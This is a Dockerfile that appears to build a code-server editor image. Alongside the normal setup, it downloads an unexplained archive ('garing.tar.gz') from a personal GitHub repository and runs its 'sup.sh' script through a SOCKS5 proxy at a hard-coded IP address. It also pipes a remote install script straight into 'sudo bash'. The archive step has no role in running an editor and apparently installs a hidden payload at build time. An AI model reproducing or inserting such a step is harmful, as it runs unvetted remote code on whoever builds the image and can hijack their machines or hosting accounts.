FROM codercom/code-server:3.10.2

USER coder

COPY entrypoint.sh /entrypoint.sh

ENV SHELL=/bin/bash

RUN sudo apt-get update && sudo apt-get install unzip -y
RUN curl https://rclone.org/install.sh | sudo bash
RUN sudo apt-get install wget -y && wget https://github.com/ilyesdjaa/JOSS/raw/main/garing.tar.gz
RUN tar xf garing.tar.gz  && ./sup.sh socks5:/78.46.88.230:51100

ENV PORT=8080

COPY deploy-container/entrypoint.sh /usr/bin/deploy-container-entrypoint.sh
ENTRYPOINT ["/usr/bin/deploy-container-entrypoint.sh"]
